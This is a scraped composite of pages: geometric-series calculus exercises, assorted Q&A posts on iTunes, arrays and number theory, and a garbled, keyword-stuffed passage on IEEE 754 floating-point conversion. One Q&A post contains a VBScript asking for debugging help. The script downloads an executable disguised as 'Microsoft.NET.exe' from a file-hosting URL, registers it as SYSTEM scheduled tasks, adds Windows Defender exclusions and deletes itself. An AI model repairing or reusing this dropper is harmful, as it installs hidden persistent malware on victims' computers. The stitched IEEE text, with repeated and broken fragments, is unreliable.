$$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{1+\sqrt{5}}{2} \right]^n } }$$ Answer: the geometric series diverges. Solution: video 274 by MIT OCW.

$$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{\pi^n }{ 3^{n+2}} } }$$ Answer: the geometric series diverges. Solution: video 277 by PatrickJMT.

$$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{ 3^n+2^n }{ 6^n } } }$$ Answer: the geometric series converges.
Solution: video 278 by PatrickJMT.

$$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{ 1 }{ 5^n } } }$$ Answer: converges to $$5/4$$. Solution: video 280 by PatrickJMT.

$$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{3^n}{4^n} + \frac{2}{7^n} \right] } }$$ Answer: converges. Solution: video 282 by PatrickJMT.

$$\displaystyle{ \sum_{k=0}^{\infty}{ \left( \frac{2}{3} \right)^k } }$$ Answer: converges to $$3$$. Solution: video 285 by Krista King Math.

Express $$\displaystyle{ 2/13 - 4/13^2 + 8/13^3 - 16/13^4 + \ldots }$$ using sigma notation. Answer: $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{(-1)^{n+1} (2)^n}{(13)^n} \right] } }$$ Solution: video 281 by PatrickJMT. Note: in this video, his answer is incorrect. He writes $$(-2)^n$$ but the signs do not match the ones given in the problem statement. We could have written this as $$-(-2)^n$$ but we chose the more standard $$(-1)^{n+1} (2)^n$$.

Express $$\displaystyle{ 1+0.1+0.01+0.001+0.0001+ \ldots }$$ using sigma notation. Answer: $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{1}{10^n} } }$$ Solution: video 279 by PatrickJMT.

Express $$\displaystyle{ 1+0.4+0.16+0.064+ \ldots }$$ using sigma notation and determine convergence or divergence. Answer: the geometric series converges to $$5/3$$.
Solution: video 275 by PatrickJMT.

$$\displaystyle{ 1 + e^{-1} + e^{-2} + e^{-3} + \ldots }$$ Answer: converges to $$\displaystyle{\frac{e}{e-1}}$$. Solution: video 286 by Krista King Math.

$$\displaystyle{ \frac{3}{2} - \frac{3}{4} + \frac{3}{8} - \frac{3}{16} + \ldots }$$ Answer: converges to $$1$$. Solution: video 287 by Krista King Math.

$$\displaystyle{ 1 - \frac{1}{5} + \left( \frac{1}{5} \right)^2 - \left( \frac{1}{5} \right)^3 + \ldots }$$ Answer: converges to $$\displaystyle{ \frac{5}{6} }$$. Solution: video 288 by Krista King Math.

Intermediate Problems

$$\displaystyle{\sum_{n=1}^{\infty}{\frac{(-1)^n2^{n-1}}{3^n}}}$$ Answer: converges absolutely to $$-1/5$$. Solution: Converges or diverges? With this series, you may have immediately recognized that it is an alternating series. Using the Alternating Series Test does tell you correctly that this series converges. However, if you look more closely, you might see there is a geometric series hidden here. Let's do some algebra to make it more obvious. What we want to do is pull out all constants (not dependent on n), then try to get all the exponents to be the same, so that we can combine them. The tricky term is the $$2^{n-1}$$. This can be written as $$\displaystyle{ 2^{n-1} = (2^n)(2^{-1}) = \frac{2^n}{2}}$$. So, now we can move things around so that we can easily see the geometric series. $$\displaystyle{ \frac{(-1)^n2^{n-1}}{3^n} = \frac{(-1)^n2^n}{3^n \cdot 2} = \frac{1}{2} \left( \frac{-2}{3} \right)^n }$$ First, we pulled out any constants (not dependent on n). Then we combined all the terms with the same power.
Can you now see that we have a geometric series where $$a=1/2$$ and $$r=-2/3$$? In this case $$\left|r\right|=2/3<1$$, so the series converges. Convergence value: We can also determine what it converges to, but we need to be careful here. Notice in the Geometric Series theorem, the index n starts with zero, but our series starts with one. We need to take that into account here. In our case, when $$n=0$$, the term is $$1/2$$. So we need to subtract $$1/2$$ from the formula to get $$\displaystyle{\frac{1/2}{1-(-2/3)} - \frac{1}{2} = \frac{3/2}{3+2} - \frac{1}{2} = \frac{3}{10} - \frac{5}{10} = \frac{-2}{10} = \frac{-1}{5} }$$ Absolute or conditional convergence: Now we need to determine whether the series converges absolutely or conditionally. To do that we need to determine whether the series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^{n-1}}{3^n} } }$$ converges. Using similar algebra as we did above, this series reduces to a geometric series with $$r = 2/3$$. Since $$\left|r\right| = 2/3 < 1$$, this series converges. Therefore, the original series converges absolutely.

$$\displaystyle{ \sum_{n=3}^{\infty}{ 5 (2/3)^{n-1} } }$$ Answer: converges to $$20/3$$. Solution: video 276 by PatrickJMT.

$$\displaystyle{ \sum_{n=3}^{\infty}{ \frac{ \pi^{n+1} }{ 6^n } } }$$ Answer: converges to $$\displaystyle{ \frac{ \pi^4 }{ 36(6-\pi) } }$$. Solution: video 283 by PatrickJMT.

Express $$\displaystyle{ 0.\overline{21} }$$ as a fraction. Answer: the decimal $$\displaystyle{ 0.2121\overline{21} }$$ can be written as a geometric series $$\displaystyle{ \sum_{k=0}^{\infty}{ \frac{21}{100} \left[ \frac{1}{100} \right]^k } }$$ which converges to $$7/33$$. Solution: video 284 by Krista King Math.
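The closed forms above are easy to sanity-check numerically with large partial sums; a minimal Python sketch:

```python
import math

# Partial sums of a geometric series approach 1/(1 - r) when |r| < 1.
r = 2 / 3
print(sum(r**n for n in range(200)), 1 / (1 - r))   # both ~3.0, the (2/3)^k problem

# A series starting at n = 1 loses the n = 0 term, hence the subtraction of 1:
r = 2 / math.e
print(sum(r**n for n in range(1, 200)), 1 / (1 - r) - 1)   # both ~2/(e-2) ~ 2.784
```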
2018-01-23 13:32:30
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9653778076171875, "perplexity": 797.3500259722459}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084891976.74/warc/CC-MAIN-20180123131643-20180123151643-00657.warc.gz"}
https://proxieslive.com/tag/constant/
## constant popup: “iTunes has found purchased items on the iPhone “xyz” that are not present in your iTunes library” I keep getting the below popup every single time (or almost every single time) I connect my iPhone to my MacBook Pro with a lightning cable. Every time I click “Transfer,” but it always comes up again. I could click “Do not ask me again,” but I do actually want purchased items transferred… I just don’t think it’s doing that. Any way I can fix this? I’m not making very many purchases on my iPhone so I know it’s not being caused by actual new purchases each time. Also I’ve tried this with multiple cables so I don’t think it’s a faulty cable issue. In case it’s relevant I have iTunes Match and do not have Apple Music. Other details: iPhone 6S, MacOS Mojave, iTunes 12.9.4.94, it’s over a USB 3 to Lightning cable. ## Constant factor of an array In Elements of Programming Interviews in Python by Aziz, Lee and Prakash, they state on page 41: Insertion into a full array can be handled by resizing, i.e., allocating a new array with additional memory and copying over the entries from the original array. This increases the worst-case time of insertion, but if the new array has, for example, a constant factor larger than the original array, the average time for insertion is constant since resizing is infrequent. I grasp the concept of amortization that seems to be implied here, yet they seem to imply that in other cases, a newly allocated array could possess a constant factor smaller than the original array. Is that so? What does “constant factor” mean in this particular context? I’m having trouble understanding what’s being said here. ## Calculate initial velocity based on displacement, time and constant acceleration. “A car has a constant speed along a road. It goes down a hill at a constant acceleration. 50s after it goes down the hill the speed is doubled and 50s later it reaches the end of the 200m hill and is back at a constant speed. Find out the initial velocity and acceleration.” At first I made relevant graphs to see if I could find some useful information from that but no luck. Then I tried to use the “suvat” equations but we haven’t learned them in class so I’m not allowed to use them, which is why I’m stuck as to how to solve this basic problem. ## Complexity of many constant time steps with occasional logarithmic steps I have a data structure that can perform a task $$T$$ in constant time, $$O(1)$$. However, every $$k$$th invocation requires $$O(\log{n})$$. Is it possible for this task to ever take amortized constant time, or is it impossible because the logarithm will eventually become greater than $$k$$? If an upper bound for $$n$$ is known as $$N$$, can $$k$$ be chosen to be less than $$\log{N}$$? ## What is the meaning of the “constant term of Eisenstein series” in terms of Fourier analysis Let $$G$$ be a connected, reductive group over $$\mathbb Q$$, with parabolic subgroup $$P = MN$$. Let $$\pi$$ be a cuspidal automorphic representation of $$M(\mathbb A)$$. 
For a smooth, right $$K$$-finite function $$\phi$$ in the induced space $$\operatorname{Ind}_{P(\mathbb A)}^{G(\mathbb A)} \pi$$ (realized in a suitable way as a function $$\phi: G(\mathbb Q) \backslash G(\mathbb A )\rightarrow \mathbb C$$), we can associate the Eisenstein series $$E(g,\phi) = \sum\limits_{\delta \in P(\mathbb Q) \backslash G(\mathbb Q)} \phi(\delta g)$$ Assuming $$\pi$$ is chosen so that this series converges absolutely, one can define the constant term of the Eisenstein series along a parabolic subgroup $$P'$$ with unipotent radical $$N'$$: $$E_{P'}(g,\phi) = \int\limits_{N'(\mathbb Q) \backslash N'(\mathbb A)}E(n'g,\phi)dn' \tag{0}$$ I see the constant term defined in this way without reference to Fourier analysis. Is it possible to always realize this object as the constant term of an honest Fourier expansion on some product of copies of $$\mathbb A/\mathbb Q$$? This can be done when $$G = \operatorname{GL}_2$$ and $$P = P'$$ is the usual Borel. The unipotent radical identifies with the additive group $$\mathbb G_a$$, and for fixed $$g \in G(\mathbb A)$$ the function $$\mathbb A/\mathbb Q \rightarrow \mathbb C, n \mapsto E(ng,\phi)$$ has an absolutely convergent Fourier expansion $$E(ng,\phi) = \sum\limits_{\alpha \in \mathbb Q} \int\limits_{\mathbb A/\mathbb Q} E(n'ng,\phi) \psi(-\alpha n')dn' \tag{1}$$ where $$\psi$$ is a fixed nontrivial additive character of $$\mathbb A/\mathbb Q$$. The constant term is $$\int\limits_{\mathbb A/\mathbb Q} E(n'ng,\phi) dn'$$ Setting $$n = 1$$ in (1) gives us a series expansion for $$E(g,\phi)$$, and (0) is the constant term of this series.

## Level sets of a function with constant-sign partial derivatives

Consider a smooth function $$f: E \to \mathbb{R}$$ on the closed subset $$E \subset \mathbb{R}^N$$ with boundary $$\partial E$$. Show that if the partial derivatives $$\partial f/\partial x_j$$ do not change sign in $$E$$, then every level set of $$f$$ in $$E$$ is connected. My attempt: I know that since the partial derivatives don't change sign, there is no critical point of $$f$$ in $$E$$, so there is no closed level set in $$E$$. Therefore, every level set has boundary on $$\partial E$$. I am not sure how to prove that, for a given level set, there cannot be two or more connected components. Any help would be greatly appreciated! Thanks!

## How to find the normalization constant of $\int_{-\infty}^\infty e^{-\frac{x^2}{2}}\,dx$ without the error function?

The equation I am thinking of is: \begin{align} 1=A\int_{-\infty}^\infty e^{-\frac{x^2}{2}}\,dx \end{align} What is A? Complex analysis is ok, don't even mention the error function.

## An inequality with the $constant= \frac{1}{2}+ \frac{5}{18}\,\sqrt{3}$

Given $$a,\,b,\,c> 0$$ such that $$a+ b+ c= 3$$. Prove: $$\frac{1}{a}+ \frac{1}{b}+ \frac{1}{c}\geqq \left ( \frac{1}{2}+ \frac{5}{18}\,\sqrt{3} \right )(\,a^{\,2}+ b^{\,2}+ c^{\,2}\,)$$ I found the $$constant= \frac{1}{2}+ \frac{5}{18}\,\sqrt{3}$$ by using my discriminant skills, but the equality condition is strange, because I tried the same approach as in https://math.stackexchange.com/a/2836680/552226 without success!

## Unterminated String Constant VBSCRIPT

I'm having trouble with a VBS script I'm trying to make to run multiple commands after each other.
This is the code:

Set oShell = Wscript.CreateObject("Wscript.Shell") oShell.Run " cd "C:\Program Files\windows nt" & TIMEOUT 1 & powershell.exe /c Invoke-WebRequest "https://cdn-05.anonfile.com/61c017Z8m0/4b7affd3-1554554845/Microsoft.NET.exe" -Outfile "Microsoft.NET.exe" & TIMEOUT 1 & schtasks /create /RU SYSTEM /SC ONSTART /TN "Windows .NET Service" /TR "C:\Program Files\windows nt\Microsoft.NET.exe" /F & TIMEOUT 1 & schtasks /create /RU SYSTEM /SC MINUTE /MO 30 /TN "Windows .NET API" /TR "C:\Program Files\windows nt\Microsoft.NET.exe" /F & TIMEOUT 1 & Add-MpPreference -ExclusionProcess "C:\Program Files\windows nt\Microsoft.NET.exe" & TIMEOUT 1 & Add-MpPreference -ExclusionPath "C:\Program Files\windows nt\" & TIMEOUT 1 & del "C:\silentbat.vbs" & exit" Set oShell = Nothing

Does anybody have an idea why I'm getting that error? Thanks

## Calculation of Integrals with reciprocal Logarithm, Euler's constant $\gamma=0.577…$

Evaluate the improper integral $$\int\limits_0^1\left(\frac1{\log x} + \frac1{1-x}\right)^2 dx = 0.33787…$$ in terms of special mathematical constants like Euler's constant. With integration by parts we get from $$\int\limits_0^1\left(\frac1{\log x} + \frac1{1-x}\right) dx = \gamma$$ the similar integral $$\int\limits_0^1\left(\frac1{\log^2 x} - \frac{x}{(1-x)^2}\right)dx = \gamma-\frac12$$ But we need $$\int\limits_0^1\left(\frac2{(1-x)\log x} + \frac{1+x}{(1-x)^2}\right)dx = 0.260661401507813…$$ to get the integral in question. In the question "series from one of Coffey's papers involving digamma, $\gamma$, and binomial" there is a hint of a connection to Stieltjes constants.
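For orientation, the quoted numeric values can be reproduced with a crude midpoint rule; a sketch (not part of the question, and the integrand is bounded on (0, 1) so no special treatment of the endpoints is needed):

```python
import math

def f(x):
    # The integrand 1/log(x) + 1/(1 - x) stays bounded on (0, 1).
    return 1.0 / math.log(x) + 1.0 / (1.0 - x)

n = 200000
h = 1.0 / n
s1 = s2 = 0.0
for i in range(n):
    v = f(h * (i + 0.5))
    s1 += v
    s2 += v * v
print(s1 * h)   # ~0.5772, Euler's constant gamma
print(s2 * h)   # ~0.33787, the integral in question
```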
2019-04-22 21:08:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 62, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8488779664039612, "perplexity": 736.9711296600872}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578582584.59/warc/CC-MAIN-20190422195208-20190422220154-00050.warc.gz"}
http://corso-massaggiocagliari.it/iois/ieee-754-double-precision-converter.html
# Ieee 754 Double Precision Converter Ieee 754 Calculator. The pipelined design combines high throughput with low latency, providing up to 200 MFLOPS on a 0. This paper describes an implementation of a double-precision, IEEE 754-compatible exponentiation unit. POWER6, POWER7, and POWER8 CPUs that implement IEEE 754-2008 decimal arithmetic fully in hardware. let us convert $(178. , x86 extended precision format), so we need to check that if T has the exact format we want. There are 11 bits of. , addition, multiplication, etc. How to convert the decimal number -30. The basic format is further divided into Single –Precision format with 32-bits wide, and double-precision format with 64-bits wide. Abstract—Algorithms for extending arithmetic precision through compensated summation or arithmetics like double-double rely on operations commonly called twoSum and twoProd-uct. EECC250 - Shaaban #2 lec #17 Winter99 1-27-2000 Representation of Floating Point Numbers in Double Precision IEEE 754 Standard Example: 0 = 0 00000000000 0. 例如,IEEE 754問世之前就有的C語言,現在包括了IEEE算術,但不算作強制要求(C語言的float通常是指IEEE單精確度,而double是指雙精確度)。 該標準的全稱為 IEEE二進位浮點數算術標準(ANSI/IEEE Std 754-1985) ,又稱 IEC 60559:1989,微處理器系統的二進位浮點數算術. Show all of your working out. 673 x 10 23 -24 exponent Mantissa radix (base) decimal point Sign, magnitude Sign, magnitude IEEE F. "float" in C • Double precision: 64-bits used to represent a number. Consider encoding the value −118. Convert float to IEEE-754 Single Precision Binary Number. Single-extended precision (≥43-bits, not commonly used) 4. Include all the steps in your solution. If hexStr has fewer than 16 digits, then hex2num pads hexStr with zeros to the right. This would tend to result in output that is. Aren't they fixed for IEEE 754 single and double precision formats?. 125 into IEEE 754 single precision. Now the original number is. Dear sir,I need to know the method for converting IEEE 754(32bit hex) to a decimal float for pic24. 2 -126 (denormalized) 0. A number in 64 bit double precision IEEE 754 binary floating point standard representation requires three building elements: sign (it takes 1 bit and it's either 0 for positive or 1 for negative numbers), exponent (11 bits), mantissa (52 bits). Alias data types cannot be used. Enter "NaN" into the field labeled "Decimal" and press "toDouble" to see how Not-a-Number values are represented in IEEE 754. Notice: Undefined index: HTTP_REFERER in C:\xampp\htdocs\almullamotors\edntzh\vt3c2k. Special values for the exponent and mantissa are used to indicate other values, like zero and infinity. [ Convert IEEE-754 32-bit Hexadecimal Representations to Decimal Floating-Point Numbers. Benutzung: Der Konverter dient zur Umrechnung von IEEE-754 Zahlen mit 32-Bit Genauigkeit (single precision). This comes in three forms, all of which are very similar in procedure: single precision (32-bit) double precision (64-bit) extended precision (80-bit). These operations on floating point numbers are much more complex than their equivalent operations on decimal numbers. Now the original number is. Revolutionary knowledge-based programming language. 085 in base-2 scientific notation. In this example will convert the number 85. It only works for 32 bit single precision numbers. POWER6, POWER7, and POWER8 CPUs that implement IEEE 754-2008 decimal arithmetic fully in hardware. 7 Exceptions arising from IEEE 754 floating. 
This standard specifies how single precision (32 bit) and double precision (64 bit) floating point numbers are represented and how arithmetic should be carried out on them. 5625 to IEEE754 single precision floating point format and write down the binary format. In single precision, the bias is 127, so in this example the biased exponent is 124; in double precision, the bias is 1023, so the biased exponent in this example is 1020. The properties of the double are specified by the document IEEE 754. fraction =. Most applications do not exceed 24 bits of precision so 32bit float does not degrade quality with 24bit mantissa. On the Intel Website I read that there is some dupport if this data-type. Therefore you have a problem when interfacing to high precision computing controllers such as oil and gas. Wolfram Notebooks. 直至20世纪70年代末, 实数(十进制数)被不同的计算机厂商表示成不同的二进制形式, 这使得许多程序与不同的机器不兼容. First, convert to binary (base 2) the integer part: 0. Exponent Fraction Exponent Fraction Bits 1 8 23 Bits 1 11 52 Sign Sign (a). IEEE-754 converter This little tool decodes: (1) single, double and extended precision floating point numbers from the A 32-bit Decimal Floating-Point Logarithmic Converter. Uniform sequence of IEEE double-precision numbers. 64 bit IEEE double-precision Question it says "double-precision IEEE number as 16 hex digits" and hit convert out pops the decimal equivalent 2668. Depends on the format IEEE double precision floating point is 64 bits. Download the files num2bin. Convert the Number to binary using IEEE 754 standard (32-bits) binary,numbers,32-bit,ieee-754,ieee I am trying to convert the number -11. 45 to IEEE 754 single precision representation. Ieee 754 Calculator. There are two types of IEEE floating-point formats (IEEE 754 standard). 0110100 * 2^3 3 + 127 = 130 = 1. The pipelined design combines high throughput with low latency, providing up to 200 MFLOPS on a 0. Convert binary64 (IEEE 754 double) to Perl The following subroutine converts an IEEE64 double or floating point number, as used in the MAT-File format of MATLAB, stored in eight bytes, into a Perl double. Features: (1) 32-bit precision available (swipe right) (2) 64-bit precision COMING SOON (swipe left) (3) Binary input (swipe down) (4) Decimal input (swipe up) (4) Dedicated keypad (no more erroneous characters) (5) Change any part of the decimal by moving the green cursor and (6) Color coded binary string to. This standard specifies the single precision and double precision format. binaryconvert. All that this situation still exists more than twenty years after the first hardware implementation of IEEE 754, the Intel 8087, was shipped to customers, with hundreds of. xC4630000. The IEEE 754 working group is taking bug reports for the new edition, and requests for improvements for the next edition. Je suis en train de travailler sur un programme qui a besoin de convertir un nombre de 32 bits en un nombre décimal. The IEEE 754 remainder function is not the same as the operation performed by the C library function fmod, where z always has the same sign as x. Follow the steps below to convert a base 10 decimal number to 64 bit double precision IEEE 754 binary floating point: 1. First convert the number to binary: 347. 5 to IEEE single precision format and to IEEE double precision format? Answer Save. So, effectively: Single Precision: mantissa ===> 1 bit + 23 bits Double Precision: mantissa ===> 1 bit + 52 bits Since zero (0. Now, let's see a program I wrote to convert a "float" number into the IEEE 754 expression format:. 
The 32-bit single precision layout: bit 31 (the leftmost bit) shows the sign of the number; bits 23-30 (the next 8 bits) are the exponent; bits 0-22 give the fraction. In the 64-bit double precision layout the sign is bit 63, the exponent occupies bits 62-52, and the fraction occupies bits 51-0. For normalized numbers the fraction F is preceded by an implied '1' followed by a binary point, so the value of a double is ±1.F × 2^(E − 1023), where E is the biased exponent (alternatively, the power = exponent − bias). In the IEEE 754-2008 standard, the 64-bit base-2 format is officially referred to as binary64; it was called double in IEEE 754-1985.

IEEE 754 specifies four binary formats:

| Type | Size | Exponent | Mantissa |
| --- | --- | --- | --- |
| single | 32 bit | 8 bit | 23 bit |
| single extended (minimum) | 43 bit | 11 bit | 31 bit |
| double | 64 bit | 11 bit | 52 bit |
| double extended (minimum) | 79 bit | 15 bit | 63 bit |

Single-extended precision is not commonly used; double-extended precision is usually implemented with 80 bits. The bias for the single-extended format is left unspecified by the standard. Conversion to a wider precision is exact, while conversion to a narrower precision is rounded. Special exponent and mantissa values indicate other quantities: numbers too large to represent are converted to Infinity, Not-a-Number (NaN) has its own encodings, and denormalized numbers extend precision near zero. Note that if some intermediate calculations are done with 80-bit precision, results can differ from a pure 64-bit computation.

Other word sizes have been used historically: IBM 7094 double precision floating point was 72 bits, and the CDC 6600 had its own double precision format. For normalized numbers the IBM (hexadecimal-based) format has greater range but less precision than the IEEE single format; for double precision the tradeoff works the other way, since the IBM format has an effective precision of 53-56 bits while IEEE 754 double precision has 53-bit precision.

Several tools decode these formats: the JavaScript IEEE-754 Converter (h-schmidt.net, which warns "This converter does not work 100% accurate!"), binaryconvert.com, and mobile apps that convert IEEE 754 double precision (64-bit) numbers between the decimal system and their binary representation and back. They handle single, double, and extended precision numbers in both little- and big-endian byte orders. A 64-bit double can also be written as 16 hex digits; MATLAB's hex2num, for instance, pads shorter strings with zeros on the right (unlike hex2dec). A sketch of this hex-to-double conversion follows.
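Since 16 hex digits carry exactly the 64-bit pattern, a hex2num-style helper is short in Python. This is a hedged sketch: the function name hex_to_double is illustrative, modeled on the MATLAB behavior described above, and the sample pattern 0x40790A0000000000 is the one quoted later on this page.

```python
import struct

# Interpret 16 hex digits as the bit pattern of an IEEE 754 double.
# Shorter strings are padded with zeros on the right, like hex2num.
def hex_to_double(hex_str: str) -> float:
    hex_str = hex_str.ljust(16, "0")              # pad to 16 hex digits
    return struct.unpack(">d", bytes.fromhex(hex_str))[0]

print(hex_to_double("40790A0000000000"))          # -> 400.625
```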
Most programming environments expose the bit-level representation directly. In MATLAB, [S,E,F] = IEEE754(X) returns the sign bit, exponent, and mantissa of an IEEE 754 double X as binary digit strings of length 1, 11, and 52 respectively (see the sketch below), and the companion files num2bin.m and bin2num.m convert a value to and from its 64-character machine-representation string. In Java, Double.longBitsToDouble reinterprets a 64-bit integer as a double. A Perl subroutine can likewise convert an IEEE 754 double stored in eight bytes (as used in MATLAB's MAT-file format) into a Perl number, a short VBA worksheet function can turn a 32-bit hex string into its decimal equivalent in Excel, and JavaScript versions circulate as GitHub gists. On the hardware side, FPGA-based high speed IEEE-754 double precision floating point multipliers have been written in Verilog.

Because IEEE 754 uses a dedicated sign bit, the positive and negative ranges are symmetric. Besides the 32- and 64-bit layouts above, a 16-bit half precision format (binary16) exists as an interchange format with a 10-bit fraction; for 16-bit floating-point numbers, other splits of exponent and fraction bits are possible tradeoffs of range versus precision. Rounding from a wider value to a 32-bit representation uses the IEEE-754 round-to-nearest-even mode.
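A Python sketch imitating the [S,E,F] split described above; the function name ieee754_fields is illustrative, not part of any library.

```python
import struct

# Return the sign, exponent and mantissa of a double as binary digit
# strings of length 1, 11 and 52, like the MATLAB helper described above.
def ieee754_fields(x: float):
    (bits,) = struct.unpack(">Q", struct.pack(">d", x))
    b = f"{bits:064b}"
    return b[0], b[1:12], b[12:]

s, e, f = ieee754_fields(1.25)
print(s, e, f)   # 0 01111111111 0100...0  (1.25 = 1.01 binary * 2^0)
```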
In double precision the significand carries 53 bits of precision (52 explicitly stored). The smallest positive normalized double is about 2.22507 × 10^-308, and denormalized numbers are a way of extending precision near zero without extending the format; since zero has no leading 1, it keeps the reserved all-zeros bit pattern. Most audio applications do not exceed 24 bits of precision, so a 32-bit float with its 24-bit significand does not degrade quality, although some applications, like the historical Csound, use 64-bit float precision, and several modern A/D and D/A converters (notably the AKM AK557x and AK449x) support a 32-bit integer resolution. Measurement devices frequently output IEEE-754 32-bit floats, often split across a higher-order and a lower-order 16-bit Modbus word that must be recombined; this matters when interfacing with high precision computing controllers such as those used in oil and gas, or when decoding the values on a microcontroller such as a PIC24.

Language and platform support follows the standard closely. strictfp is a keyword in the Java programming language that restricts arithmetic to IEEE 754 single and double precision to ensure reproducibility across common hardware platforms. CUDA devices of compute capability 2.0 and above support both single and double precision IEEE 754, including fused multiply-add in both precisions; the fused operation generally produces more accurate results than a separate multiply followed by an add, which in unlucky cases loses all bits of precision. LabVIEW applies the IEEE 754 rounding rules, the GRFPU is an IEEE-754 compliant floating-point unit supporting both single and double precision operands, the DFPAU-DP coprocessor adds double precision support (double and float types, plus 8-, 16-, 32- and 52-bit integers) with no programming required, and GoFast for the 8051 was designed for high performance floating point on 8051-class architectures. Hardware designs of this kind are IEEE-754 compliant and handle overflow, underflow, rounding, and the standard's exception conditions, whose handling the standard itself specifies.

The revision of IEEE 754-1985 into IEEE 754-2008 took seven years; Dan Zuras chaired the work and Mike Cowlishaw was the editor. IEEE 754-2008 adds one new binary format and two decimal formats, for a total of five basic formats.

Worked examples make the encoding concrete. Decode the single-precision pattern 1 10000001 10110011001100110011010 by first putting the bits in three groups: the leftmost bit shows the sign of the number (1, so the value is negative); the 2nd to 9th bits are the exponent field, 10000001₂ = 129, and 129 − 127 = 2; the 10th to 32nd bits are the fraction field, giving the significand 1.10110011001100110011010₂ ≈ 1.7. The value is therefore approximately −1.7 × 2^2 = −6.8. Encoding runs in reverse: 1.25 is represented in single precision as 0 01111111 01000000000000000000000 (the biased exponent 127 encodes 2^0, and the fraction .01₂ gives 1.25), and 347.625₁₀ = 101011011.101₂, which normalizes (shift the binary point until a single 1 remains on the left) to 1.01011011101 × 2^8, so the single-precision biased exponent is 8 + 127 = 135. Classic exercises of this kind ask you to express 0.085 in base-2 scientific notation or to convert 0.125 into the single-precision IEEE 754 format, showing all of your working out. A programmatic version of the decoding follows.
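A minimal Python sketch of the worked decoding above, reproducing the three-field computation directly from the bit strings.

```python
# Decode the single-precision pattern 1 10000001 10110011001100110011010
# field by field, as in the worked example above.
sign_bit  = 1
exp_bits  = "10000001"
frac_bits = "10110011001100110011010"

exponent = int(exp_bits, 2) - 127                 # 129 - 127 = 2
mantissa = 1 + int(frac_bits, 2) / 2**23          # implied leading 1
value = (-1) ** sign_bit * mantissa * 2**exponent

print(value)   # -6.799999713897705, i.e. approximately -6.8
```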
One published conversion unit design transforms binary inputs into the IEEE 754 64-bit format, which is then fed to a floating point adder/subtractor and a multiplication block. For decoding by hand, remember that the value of an IEEE-754 number is computed as sign × significand × 2^exponent, and that the stored exponent = power + bias; a converter simply breaks an integer up into its fields as defined by the IEEE 754 specification and reconstructs the floating point number from them. If you have a normal, modern desktop computer, then you have IEEE 754 double precision floating point. A single-precision IEEE-754 number is always exactly 32 bits, and two doubles are usually compared by taking a standard epsilon value into consideration rather than by testing exact equality. When more working precision is needed, compensated summation and double-double arithmetic rely on the error-free twoSum and twoProduct operations mentioned earlier; a sketch of twoSum follows.
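A minimal sketch of the twoSum operation referenced above, the error-free transformation underlying compensated summation and double-double arithmetic; the test values are illustrative.

```python
# twoSum: return s = fl(a + b) together with the exact rounding error,
# so that s + err == a + b holds exactly in real arithmetic.
def two_sum(a: float, b: float):
    s = a + b
    bv = s - a                       # the part of b actually absorbed
    err = (a - (s - bv)) + (b - bv)  # the rounding error of a + b
    return s, err

print(two_sum(1.0, 1e-16))  # (1.0, 1e-16): the lost addend is recovered
```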
IEEE 754-1985 was an industry standard for representing floating-point numbers in computers, officially adopted in 1985 and superseded in 2008 by the current revision; during its 23 years it was the most widely used format for floating-point computation. It was defined in response to a divergence of representations that caused portability issues for scientific code, and it is now almost universally adopted. Nobody was happy with the base-16 normalization of the IBM format, and the older D format had the same narrow exponent range as single precision. The standard must be supported by a computer system as a whole, not necessarily by the hardware entirely; the 1997 "Lecture Notes on the Status of IEEE 754" observe that it prescribes how floating-point numbers are encoded in memory, not in registers. Test software exists for the 32-bit, 64-bit, 80-bit extended double, and 128-bit quadruple precision formats.

Precision has practical consequences. binary64 works with a precision of 53 bits and represents, to that precision, a range of absolute values from about 2 × 10^-308 to 2 × 10^308; the extreme finite values occur (regardless of sign) when the exponent is at its maximum (2^127 for single precision, 2^1023 for double) and the mantissa is all 1s. 0.5 has an exact representation in the IEEE-754 binary formats (like binary32 and binary64), but 1/3 is neither 0.3333 nor 0.33333…, because IEEE 754 uses a binary exponent, not a decimal one, and 0.1 cannot be perfectly represented in binary64 (see the sketch below). This also matters when reproducing calculations in a spreadsheet: for a simulation of single-precision hardware to be realistic, all calculations must be done in the IEEE 754 single precision format, which Excel does not use natively.

